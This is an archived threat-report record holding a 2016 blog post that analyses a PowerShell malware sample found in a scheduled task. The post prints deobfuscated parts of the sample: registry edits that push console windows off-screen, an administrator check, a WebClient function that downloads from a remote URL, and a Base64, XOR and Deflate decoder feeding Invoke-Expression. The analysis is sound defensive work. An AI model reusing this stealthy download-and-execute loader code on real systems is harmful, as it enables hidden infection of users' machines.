{
	"id": "c2189cf0-4139-49dd-bc98-e404d5d6117b",
	"created_at": "2026-04-06T00:07:31.163477Z",
	"updated_at": "2026-04-10T03:20:51.690942Z",
	"deleted_at": null,
	"sha1_hash": "c03630733147f30d7b3314ac972cbfaeaf2873af",
	"title": "PowerShell Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 129764,
	"plain_text": "PowerShell Malware\r\nBy cantoris\r\nPublished: 2016-07-22 · Archived: 2026-04-05 17:48:38 UTC\r\n22 Friday Jul 2016\r\nSaw my first example today of an in-the-wild PowerShell Malware on an infested laptop. It had already been cleaned by MalwareBytes but I looked it over with Process Explorer and Autoruns and spotted a strange Scheduled Task.\r\nThe task name was the GUID “{080A7D47-0B0F-0B0B-0511-7D0A7F781109}” which I’m pasting here in case it’s constant for all infected machines. The task was set to run at 18:01 and run PowerShell with the usual -ExecutionPolicy Bypass and the -EncodedCommand parameter followed by a long string.\r\nI decoded the string with the following:\r\n$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))\r\n(Source)\r\nI put the result in the ISE and then reformatted it to make it readable. The first thing the script did was set all Preference variables to SilentlyContinue except for the ErrorAction one which it set to Stop. Next was a particularly interesting bit of code. I’ve removed two Try-Catch constructs for readability:\r\nfunction sr($p) {\r\n    $n = \"WindowPosition\"\r\n    New-Item -Path $p | Out-Null\r\n    try {\r\n        New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664 | Out-Null\r\n    } catch {\r\n        Set-ItemProperty -Path $p -Name $n -Value 201329664 | Out-Null\r\n    }\r\n}\r\nsr(\"HKCU:\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe\")\r\nsr(\"HKCU:\\Console\\%SystemRoot%_System32_svchost.exe\")\r\nsr(\"HKCU:\\Console\\taskeng.exe\")\r\nI’d not really looked at that referenced area of the registry before. If I look at my own HKEY_CURRENT_USER\\Console, I see the following subkeys which all clearly contain various values to do with console-type window positions, sizes, colours etc:\r\nThe piece of code above is creating keys for the PowerShell Console app, svchost.exe and taskeng.exe and then giving them a WindowPosition value of 201329664. The documentation for that value shows that the high and low order bytes of it determine the X and Y positions respectively. In Hex, that value is 0C00 0C00. 0C00 is decimal 3072. What this ensures is that if PowerShell or the other processes open a Window, it will open off-screen at coordinates 3072×3072!\r\nThe code next exits if PowerShell is less than v2, or if the OS is older than XP SP2, or if the current user is not an Administrator. The latter test uses this neat little one-liner:\r\nif (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]\"Administrator\")) { break }\r\nNext, there is a long dubious URL in a string which is then passed to the following function to download data from it using the System.Net.WebClient class. Note the User-Agent header being passed:\r\nfunction wc($url) {\r\n    $rq = New-Object System.Net.WebClient\r\n    $rq.UseDefaultCredentials = $true\r\n    $rq.Headers.Add(\"user-agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)\")\r\n    return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url))\r\n}\r\nThe returned data is then decoded from Base64, deobfuscated (Xor) and decompressed with the following function:\r\nfunction dstr($rawdata) {\r\n    $bt = [Convert]::FromBase64String($rawdata)\r\n    $ext = $bt[0]\r\n    $key = $bt[1] -bxor 170\r\n    for ($i = 2; $i -lt $bt.Length; $i++) {\r\n        $bt[$i] = ($bt[$i] -bxor (($key + $i) -band 255))\r\n    }\r\n    return (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt, 2, ($bt.Length - $ext))), [IO.Compression.CompressionMode]::Decompress))).ReadToEnd()\r\n}\r\nThere are some rather developery .NET classes in there for me to look up when I’m feeling particularly bored…!\r\nI suspect you can guess how the code ends. The returned string is passed to Invoke-Expression to be executed to cause the next stage of the infection.\r\nSadly, the tale ends here, as the URL given no longer has any live code to download. 😦\r\nSource: https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/"
	],
	"report_names": [
		"powershell-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.pdf",
		"text": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.txt",
		"img": "https://archive.orkl.eu/c03630733147f30d7b3314ac972cbfaeaf2873af.jpg"
	}
}